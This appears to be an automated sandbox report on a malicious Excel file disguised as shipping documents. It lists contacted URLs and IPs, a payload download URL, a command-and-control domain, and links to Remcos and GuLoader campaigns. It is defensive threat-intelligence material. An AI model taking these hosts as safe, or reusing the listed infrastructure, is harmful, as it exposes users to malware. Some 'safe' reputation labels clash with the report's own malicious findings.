https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	RegAsm.exe, 00000012.00000002.478910801.0000000000353000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=	powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	bhv4625.tmp.18.dr	false	URL Reputation: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	bhv4625.tmp.18.dr	false	URL Reputation: safe	unknown
https://gmpg.org/xfn/11	powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767	powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://198.46.176.133	powershell.exe, 0000000C.00000002.453941853.00000000022FB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1	powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cache.btrll.com/default/Pix-1x1.gif	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com	RegAsm.exe, RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp/C	powershell.exe, 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://o.aolcdn.com/ads/adswrappermsni.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://asociatiatraditiimaria.ro	powershell.exe, 00000016.00000002.958799060.000000000283B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehp	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://static.chartbeat.com/js/chartbeat.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-de/?ocid=iehp	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFj	EQNEDT32.EXE, 0000000A.00000002.439305634.000000000026F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://login.yahoo.com/config/login	RegAsm.exe	false	URL Reputation: safe	unknown
http://104.168.45.34	powershell.exe, 0000000C.00000002.460357536.0000000009268000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.453941853.00000000021C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.958799060.0000000002705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.958702628.0000000002701000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://hq.ax/Oi8yX	1E630000.0.dr, ~DFBD4D1EC3A255F639.TMP.0.dr	false	Avira URL Cloud: safe	unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://asociatiatraditiimaria.ro/comments/feed/	powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imvu.com/cK	RegAsm.exe, 00000015.00000002.476365629.00000000003AC000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/8/nrrV73987.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://www.imvu.com	RegAsm.exe, RegAsm.exe, 00000015.00000002.479031238.0000000002089000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.w.org/	powershell.exe, 00000016.00000002.958799060.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.958799060.0000000002A74000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://asociatiatraditiimaria.ro/wp-json/	powershell.exe, 00000016.00000002.958799060.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.958799060.0000000002A74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://www.msn.com/	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hq.ax/	hq.ax.url.3.dr	false	Avira URL Cloud: safe	unknown
http://new.quranushaiqer.org.sa	powershell.exe, 00000016.00000002.958799060.0000000002A89000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2	powershell.exe, 00000016.00000002.963663596.000000000375C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.963663596.000000000373F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://new.quranushaiqer.org.sa	powershell.exe, 00000016.00000002.958799060.0000000002A7B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://cdn.at.atwola.com/_media/uac/msn.html	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://go.microsoft.c	powershell.exe, 0000000C.00000002.453767523.000000000047C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/accounts/servicelogin	RegAsm.exe	false	Avira URL Cloud: safe	unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://policies.yahoo.com/w3c/p3p.xml	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.msn.com/advertisement.ad.js	bhv4625.tmp.18.dr	false	Avira URL Cloud: safe	unknown
http://www.ebuddy.com	RegAsm.exe, RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.166.62.190	new.quranushaiqer.org.sa	United States	2686	ATGS-MMD-ASUS	false
93.113.54.56	asociatiatraditiimaria.ro	Romania	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
188.114.97.3	shortify.pro	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	hq.ax	European Union	13335	CLOUDFLARENETUS	true
192.253.251.227	iwarsut775laudrye2.duckdns.org	United States	50613	THORDC-ASIS	true
198.46.176.133	unknown	United States	36352	AS-COLOCROSSINGUS	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
104.168.45.34	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482974
Start date and time:	2024-07-26 13:01:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Sample name:	waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLS@27/43@32/8
EGA Information:	Successful, ratio: 71.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 171 Number of non-executed functions: 308
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer Override analysis time to 44375.6624321705 for current running targets taking high CPU consumption Override analysis time to 88751.3248643411 for current running targets taking high CPU consumption Override analysis time to 177502.649728682 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.72.249.15, 23.72.249.34, 199.232.214.172
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, download.windowsupdate.com.edgesuite.net
Execution Graph export aborted for target EQNEDT32.EXE, PID 3468 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1812 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:02:40	API Interceptor	49x Sleep call for process: EQNEDT32.EXE modified
07:02:41	API Interceptor	63x Sleep call for process: wscript.exe modified
07:02:42	API Interceptor	12949x Sleep call for process: powershell.exe modified
07:02:48	API Interceptor	3795293x Sleep call for process: RegAsm.exe modified

LLM Input / Output

Input

Output

URL: Office document Model: gpt-4o

```json
{
  "riskscore": 9,
  "reasons": "The screenshot contains a visually prominent Microsoft Office logo and a message stating 'This document is protected'. The text instructs the user to 'Enable Content' to view the document, which is a common tactic used in phishing attacks to trick users into enabling macros that can execute malicious code. The use of the Microsoft Office branding is likely an attempt to impersonate a well-known brand to gain the user's trust. The instructions create a sense of urgency by implying that the document cannot be viewed without following the steps provided. This combination of factors indicates a high risk of phishing or malware."
}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
93.113.54.56	dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs	Get hash	malicious	Unknown	Browse
	dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs	Get hash	malicious	Unknown	Browse
	https://avocat.srl/Auth#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==%25RANDOM5#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==96682=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d%25=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d	Get hash	malicious	Unknown	Browse
188.114.97.3	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	#U00d6DEME TAVS#U0130YES#U0130.xls	Get hash	malicious	Remcos	Browse	tny.wtf/4Gs
	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining2.com/h9fmdW6/index.php
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
	LisectAVT_2403002B_412.exe	Get hash	malicious	FormBook	Browse	www.whatareyoucraving.com/drbb/
	AVISO DE PAGO.xls	Get hash	malicious	Unknown	Browse	tny.wtf/pqv2p
	AVISO DE PAGO.xls	Get hash	malicious	Unknown	Browse	tny.wtf/pqv2p
	AVISO DE PAGO.xls	Get hash	malicious	Unknown	Browse	tny.wtf/pqv2p
	PO S0042328241130.xls	Get hash	malicious	Remcos	Browse	tny.wtf/vMCQY
188.114.96.3	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/dGa
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jjJsPX
	xptRc4P9NV.exe	Get hash	malicious	Unknown	Browse	api.keyunet.cn/v3/Project/appInfo/65fc6006
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
	LisectAVT_2403002B_89.exe	Get hash	malicious	CobaltStrike	Browse	cccc.yiuyiu.xyz/config.ini
	54.xls	Get hash	malicious	FormBook	Browse	tny.wtf/
	Order_490104.xls	Get hash	malicious	Unknown	Browse	tny.wtf/vb
	Order_490104.xls	Get hash	malicious	Unknown	Browse	tny.wtf/vb
	Scan copy.xls	Get hash	malicious	Unknown	Browse	tny.wtf/3VC

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
shortify.pro	042240724.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.97.3
	INV 66077.xls	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	DRWG-347RB1.pd.xls	Get hash	malicious	FormBook	Browse	188.114.96.3
iwarsut775laudrye2.duckdns.org	waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.228
	awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
	UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
	ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
	awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
	pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
	awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
	korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
	awbshippinglabeldocuments1906202400000000000..vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.253.251.227
asociatiatraditiimaria.ro	dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs	Get hash	malicious	Unknown	Browse	93.113.54.56
asociatiatraditiimaria.ro	dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbs	Get hash	malicious	Unknown	Browse	93.113.54.56
geoplugin.net	Payment Advice__HSBC Banking.pdf.lnk	Get hash	malicious	Remcos	Browse	178.237.33.50
	C1ZsNxSer8.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Quotation.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_101.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_407.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	LisectAVT_2403002A_431.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	IAENMAIL-A4-240717-0830-000090912_PDF.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	CDG__ Copia de Pagamento.pdf.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	CFS-0682-2-08 Order.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
bg.microsoft.map.fastly.net	https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1j	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://forms.office.com/r/xULzprLcwH	Get hash	malicious	Unknown	Browse	199.232.214.172
	29246162652093218035.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	Dreher_Blend_Order_-_Week_33.xlsm	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://cs9.biz	Get hash	malicious	Unknown	Browse	199.232.210.172
	57151318598011868.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	http://baghoorg.xyz	Get hash	malicious	Unknown	Browse	199.232.214.172
	List of Documents.xls	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse	199.232.214.172
	NotaFiscal.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://google.com.mx/amp/s/ecbma-rhfobf-vbasi-randall13liny-online.translate.goog/mqiogm/kdpc/bbk/ycdzjp/npxmll/bpua/annelore.tack@vpkgroup.com/zelenskky/c?_x_tr_sl=de&_x_tr_tl=en&_x_tr_hl=id&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	104.21.72.79
	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Get hash	malicious	FormBook	Browse	172.67.134.182
	https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=	Get hash	malicious	Phisher	Browse	188.114.96.3
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxm	Get hash	malicious	HTMLPhisher	Browse	172.67.159.233
	https://forms.office.com/r/WH4W8hyyNA	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
GTSCEGTSCentralEuropeAntelGermanyCZ	LisectAVT_2403002A_35.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	sh4.elf	Get hash	malicious	Mirai	Browse	195.56.40.173
	RiI7W2cj7p.elf	Get hash	malicious	Unknown	Browse	213.29.127.166
	https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.html	Get hash	malicious	CVE-2024-21412	Browse	85.9.47.248
	KBNCt45Gpk.elf	Get hash	malicious	Mirai	Browse	212.203.170.235
	5xUAAMwlnJ.elf	Get hash	malicious	Unknown	Browse	193.86.218.248
	COMANDA_AXM_NR17_DIN_240717.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.146.87.128
	92.249.48.47-skid.ppc-2024-07-20T09_04_20.elf	Get hash	malicious	Mirai, Moobot	Browse	217.153.110.218
	waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbs	Get hash	malicious	GuLoader, Remcos	Browse	188.214.214.160
	botx.arm6.elf	Get hash	malicious	Mirai	Browse	213.29.20.194
CLOUDFLARENETUS	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	104.21.72.79
	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Get hash	malicious	FormBook	Browse	172.67.134.182
	https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=	Get hash	malicious	Phisher	Browse	188.114.96.3
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxm	Get hash	malicious	HTMLPhisher	Browse	172.67.159.233
	https://forms.office.com/r/WH4W8hyyNA	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
ATGS-MMD-ASUS	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	34.149.100.209
	file.exe	Get hash	malicious	Babadeda	Browse	34.149.100.209
	file.exe	Get hash	malicious	Babadeda	Browse	34.149.100.209
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	34.149.100.209
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	34.160.144.191
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	34.160.144.191
	6Vm1Ii4ASz.exe	Get hash	malicious	Babadeda	Browse	34.149.100.209
